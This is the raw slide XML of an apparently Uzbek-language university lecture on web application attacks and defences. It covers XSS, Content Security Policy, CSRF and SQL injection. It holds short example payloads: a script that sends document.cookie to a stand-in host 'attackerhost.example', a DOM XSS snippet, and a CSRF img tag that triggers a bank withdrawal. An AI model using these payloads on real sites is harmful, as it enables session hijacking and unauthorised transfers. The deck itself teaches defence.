              <a:t>="http://attackerhost.example/cgi-bin/cookiesteal.cgi?"+document.cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361950">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361950">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	Web-sahifadagi cookie hujum qilganning oldindan tayyorlab qo'ygan manziliga jo'natiladi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361950">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DOM modellarga asoslangan hujum:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361950">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361950">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>script&gt;document.write(location.href);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361950">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361950">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	HTML yoki XML hujjatning strukturasi yoki matnini o'zgartirish orqali amalga oshiriladi.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1178701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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845733"/>
            <a:ext cx="10058400" cy="4710341"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Himoyalanishda quyidagilardan foydalanish mumkin:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Boshqaruvchi HTML belgilar, JavaScript, CSS va URLlarni brauzerda ko'rsatishdan oldin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>kodlash. Kiruvchi parametrlarni filtrlash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>uchun quyidagi funksiyalardan foydalanish mumkin: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>filter_var (o'zgaruvchilarni maxsus filtrlar asosida filtrlash), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>htmlentities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(HTMLni filtrlash uchun)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Kiruvchi berilganlarni kodlash. Masalan, OWASP Encoding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Project, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTML Purifier, htmLawed, Anti-XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Class kutubxonalari yordamida</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Doimiy ravishda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>kod xavfsizligini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>avtomatlashtirilgan va qo'lda tahlil qilish va testlash. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>, Nikto Web Scanner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>va</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>OWASP Zed Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> kabi dasturiy ta'minotlardan foydalanish mumkin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Har bir web-sahifada sahifa kodirovkasini (windows-1251, utf-8 va h.k.) aniq qilib ko'rsatish</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cookie xavfsizligini ta'minlash (qabul qilinadigan cookielar domeni va manziliga turli cheklovlar qo'yish orqali)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>js, css, rasmlar va boshqalarni yuklashga ruxsat berilgan manbalar ro'yxatini aniqlashga imkon beruvchi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Content Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Policydan foydalanish</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Mijoz tomonidan esa: brauzerni doimiy ravishda yangilash, brauzerlar uchun forma maydonlari, URL manzillarni, POST so'rovlarni tekshiruvchi turli kengaytmalardan foydalanish (masalan, NoScript)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176736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Security Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>CSP meta teg orqali aniqlash mumkin:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>';"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Content-Security-Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>: default-src 'self';</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167" y="4358576"/>
            <a:ext cx="9289451" cy="1370194"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5977468"/>
            <a:ext cx="3067186" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.w3.org/TR/CSP3/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5606062" y="2469988"/>
            <a:ext cx="6113218" cy="1834401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3932158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Security Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Namunalar:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Content-Security-Policy: default-src 'self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> – kontent faqat joriy server tomonidan taqdim etilishi kerak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Content-Security-Policy: default-src 'self' *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0"/>
              <a:t>trusted.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> – ishonli domen va uning subdomenlari oqali </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Content-Security-Policy: default-src 'self'; img-src *; media-src media1.com media2.com; script-src </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0"/>
              <a:t>userscripts.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>- rasmlar ixtiyoriy manbadan olinishi mumkin;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>- boshqa media fayllar media1.com media2.com dangina olinishi mumkin (xattoki ularning subdomenlaridan ham emas)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>- ishga tushuvchi kod faqat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>userscripts.example.com dan olinishi mumkin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Content-Security-Policy: default-src https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0"/>
              <a:t>onlinebanking.jumbobank.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>– faqat HTTPS orqali onlinebanking.jumbobank.com manbasidan olinishi mumkin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4171340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Cross Site Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>CSRF (XSRF) – so'rovni saytlararo qalbakilashtirish.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Masalan, foydalanuvchi shunday saytga tashrif buyurishi mumkinki, bu sayt orqali boshqa serverga o'zi bilmagan holda so'rov jo'natishi mumkin, masalan, to'lov sistemasi serveriga. Lekin bunda foydalanuvchi to'lov sistemasida autentifikatsiyadan o'tgan bo'lishi va so'rov hech qanday tasdiqlashlarni talab qilmasligi kerak.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Namuna:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Salom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Ushbu rasmdagi ajoyib manzarani qarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>&lt;img src="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>bank.example.com/withdraw?amount=1000000&amp;for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Agar bank tizimida foydalanuvchining autentifikatsiyadan o'tganligi cookieda saqlansa va ular hali o'chmagan bo'lsa brauzer Id si 123456 bo'lgan mijozga 1000000 miqdorda summa o'tkaziladi. Albatta bunda bank tizimining xavfsizligi juda past deb hisobga olinganda. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="526371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1663</TotalTime>
  <Words>1094</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Consolas</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Retrospect</vt:lpstr>
      <vt:lpstr>Xavfsizlik</vt:lpstr>
      <vt:lpstr>Web-server strukturasi</vt:lpstr>
      <vt:lpstr>Web-serverga hujumlar</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Content Security Policy</vt:lpstr>
      <vt:lpstr>Content Security Policy</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery</vt:lpstr>
      <vt:lpstr>SQL-Injection</vt:lpstr>
      <vt:lpstr>SQL-Injection</vt:lpstr>
      <vt:lpstr>SQL-Injection</vt:lpstr>
      <vt:lpstr>SQL-Injection</vt:lpstr>
      <vt:lpstr>SQL-Injection</vt:lpstr>
      <vt:lpstr>SQL-Injection</vt:lpstr>
      <vt:lpstr>Savollar?</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PHPda berilganlar bazasi bilan ishlash. Berilganlar bazasini tashkil qilish va undan foydalanish.</dc:title>
  <dc:creator>User</dc:creator>
  <cp:lastModifiedBy>Qodirbek</cp:lastModifiedBy>
  <cp:revision>481</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-20T08:25:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-30T16:40:04Z</dcterms:modified>
</cp:coreProperties>
</file>